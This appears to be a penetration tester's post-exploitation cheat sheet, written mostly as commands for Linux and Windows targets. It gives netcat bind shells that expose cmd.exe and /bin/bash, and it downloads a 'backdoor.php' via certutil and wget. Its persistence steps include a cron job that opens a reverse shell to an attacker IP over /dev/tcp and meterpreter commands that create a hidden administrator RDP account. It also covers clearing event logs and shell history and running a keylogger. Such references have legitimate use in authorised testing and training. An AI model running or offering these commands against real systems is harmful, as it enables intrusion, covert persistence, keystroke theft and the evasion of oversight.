Post-Exploitation & Commands

Useful Commands

Linux

ctrl + c # Terminate the currently running command
ctrl + r # Search the current terminal session’s command history
ctrl + a # Go to the start of line
ctrl + e # Go the the end of line
ctrl + z # Sleep program

# Files
base64 -w 0 file.txt             # Encode file to Base64
wc -l file.txt                   # Count Lines
wc -c file.txt                   # Count Chars
cat file.txt | sort | uniq       # Sort and delete duplicates
sed -i 's/OLD/NEW/g' file.txt    # Replace string inside a file
ls -al /etc/cron*                # Display all file that start with cron*
cat /etc/cron*                   # Display the contents of all cron* files

# Decompress
7z -x file.7z                # .7z
bzip2 -d file.bz2            # .bz2
gunzip file.gz               # .gz
tar -xvzf file.tar.gz        # .tar.gz
tar -jxf file.tar.bz2        # .tar.bz2
tar -xvjf file.tbz           # .tbz
tar -xvzf file.tgz           # .tgz
unzip file.zip               # .zip
unxz file.xz                 # .xz            (apt install xz-utils)

# Clipboard
xclip -sel c < file.txt

# Search strings inside files
grep -ri password # Search password (case insensitive) in all subdirectory
grep -Ei 'pass|user' file.txt # Search pass or user strings in file.txt
grep -Eri 'pass|user' # Search pass or user strings in all subdirectory
# with color, ignore binaries (-I), print line number (-n) and redirect errors
grep --color=auto -rn -iIE "PASSW|PWD" 2>/dev/null

# Change user: root
su
# Change user: <username>
su <username>
# Change Linux user password (Copy output and past it in /etc/shadow)
openssl passwd -1 -salt <salt> <new_pass> # -1 means weakest algorithm, -6 means strongest

Enumeration

# System info
cat /etc/os-release # Print linux distro version
cat /etc/issue      # Print linux distro version 
lsb_release -a      # Print linux distro version
uname -a            # Print certain system information.
env                 # Print environment variables
lscpu               # Hardware info
free -h             # RAM usage
df -h               # Disk usage
dpkg -l             # List packages installed with version

# Enumerate Users
whoami
groups <user>
useradd -m <user> -s /bin/bash # Creates a user
usermod -aG root <user>        # Add bob to root group
lastlog                        # Ssh session enumerate
last                           # Log of users logged in

# Enumerate Network
ip a                 # Useful also to discover other network
cat /etc/hostname    # Display hostname
cat /etc/hosts       # Maps IP addresses to domain (Useful to discover internal domain you can access)
cat /etc/resolv.conf # Display the domain name server (Many times it is the default gateway)
netstat -tulpn       # Display the network connections
arp -a               # Display the host ARP cache
route                # View and modify the routing table
# Note: gateway is important... it can be a DNS server, DHCP server or all in one

# Processes & services
ps aux         # Display all process. It use windows size (truncation)
ps auxw        # Use 132 columns to display info, instead of the window size.
ps auxww       # ps will use as many columns as necessary.
top            # Dynamic real-time view of a running system (like task manager)
crontab -l     # Display cronjob for the root user

Windows

:: System info
systeminfo
:: Get current user
whoami  
:: Get current user privileges
whoami /priv
:: Get installed updates. Useful to see security patch
wmic qfe get Caption,HotFixID,InstalledOn,Description 
:: Adds, displays, or modifies local groups
net localgroup
:: Get group membership of user -> net localgroup administrators
net localgroup <group>
:: Get user info
net user <user>

:: Network Info
ipconfig /all
:: Lists info on tcp/udp ports
netstat -ano
:: Shows f/w status
netsh advfirewall show allprofiles
:: Display arp table (arp cache to discover other IP addresses on the target network)
arp -a
:: Print route table (useful during the pivoting phase of post-exploitation as it can reveal network routes)
route print

:: Processes & Services
:: Lists services running
net start
:: Same as above with extra details like pid, active state, etc.
wmic service list brief
:: Stop a service
net stop <servicename>
:: List process with respecive services
tasklist /svc 
:: List scheduled tasks
schtasks /query /fo list /v
:: Automation : JAWS - https://github.com/411Hall/JAWS
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

:: Change Windows user password
net user <username> <new_pass>

Bind Shell

This type of shell is not preferred as the attacker directly connects to the target system and in most cases, ingress traffic is always blocked or flagged as suspicious.

# Windows (target)
nc -nvlp <target_port> -e cmd.exe 
nc.exe -nvlp <target_port> -e cmd.exe

# Linux (target)
nc -nvlp <target_port> -e /bin/bash

# Linux (attacker)
nc -nv <target_ip> <target_port>

# Windows (attacker)
nc.exe -nv <target_ip> <target_port>


# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run

Transfer files

# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 127.0.0.1:8080

# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php

# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php         # [recepient]
nc -w 3 <ip> <target_port> < backdoor.php     # [sender]

# With base64
cat file | base64 -w 0 # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file # create file

# Tips
# 1 tip - Progress Indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check md5
md5sum backdoor.php

# Note: netcat "-n" option means no DNS (only IP)

[Fully] interactive shell

Interactive shell

/bin/bash -i # Linux

Fully interactive shell

# 1 Step
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

# 2 Step
CTRL + Z # Press CTRL + Z to background process and get back to your host machine

# 3 Step
stty raw -echo; fg

# 4 Step
export TERM=xterm

Automatic

# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported. 
# There's basic support (netcat-like interaction + logging)

./penelope.py <port>               # Reverse shell
./penelope.py -c <target> <port>   # Bind shell

Pivoting & Port forwarding

Metasploit (meterpreter) - Autoroute: Anytime we want to contact a machine within one of the networks specified, we will go through meterpreter session and use that to connect to the targets.

# Find subnet (the 2nd target host may be in other network)
ipconfig                     # IP: 19.9.29.148. Netmask: 255.255.240.0

# Add routes
run autoroute -s <subnet>    # Ex: run autoroute -s 10.10.0.29.0/20

# Displays active routing table
run autoroute -p

# Now you can perform a scan. auxiliary/scanner/portscan/tcp 

Notes

• Scanning with metasploit is limited (we can't discover software version etc...) so it's better to use nmap. To do that we need to perform port forwarding.

• Since target_sys_2 does not have a route back to attacker_sys, when you user an exploit, use bind_shell payload. Ex: windows/meterpreter/bind_tcp

---

Port forwarding (meterpreter/metasploit)

# Forward remote port to local port. Here, we want to scan the port 80 of the target 2
portfwd add -l 1234 -p 80 -r <target_sys_2_ip>

portfwd list
nmap -sV -sC -p 1234 localhost

Persistence

Windows

(1) Metasploit - Module: Search persistence module (Windows). Ex: exploit/windows/local/persistence_service (Requires admin or system privileges). When you want to connect again set a listener to receive the connection

(2) Enable RDP

• First way with metasploit: search enable_rdp (and set session). Then connect to victim.

Note: you need username and password, if you don't have the password, change it net user <username> <new_pass> (suspicious in a real environment) or crack NTLM or you can create a new account and add it to administrator group.

• Second way with metasploit/meterpreter (auto create account and settings):

# In meterpreter
run getgui -e -u user_you_want -p password_you_want

# This enables rdp service -> 
# Creates new user with the provided parameters -> 
# Hides user from windows login screen -> 
# Adds user to Remote Desktop Users and Administrators group

Linux

(1) Metasploit: Search persistence module (Linux). Example: post/linux/manage/sshkey_persistence (needed elevated privs - This module will add an SSH key to a specified user)

(2) Via SSH key: After gaining access to linux system, you can transfer SSH private key to local machine and use it to connect via SSH

(3) With cron jobs

# 1. Set up listener
# 2. Create a cronjob (every minute time format)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron 
# 3. This will replace the user's existing crontab with the contents of 'cron'
crontab cron

# Crontab for the current user
crontab -l 
#NOTE: if the command doesn't work try with another revshell

Clearing tracks

Windows

# Metasploit/Meterpreter
clearev  # Clear the Application, System, and Security logs on a Windows system

Linux

history -c                          # Clear history
cat /dev/null > ~/.bash_history     # Same as above

Keylogger

# With metasploit
keyscan_start          # Start keylogger
keyscan_dump print     # Captured strokes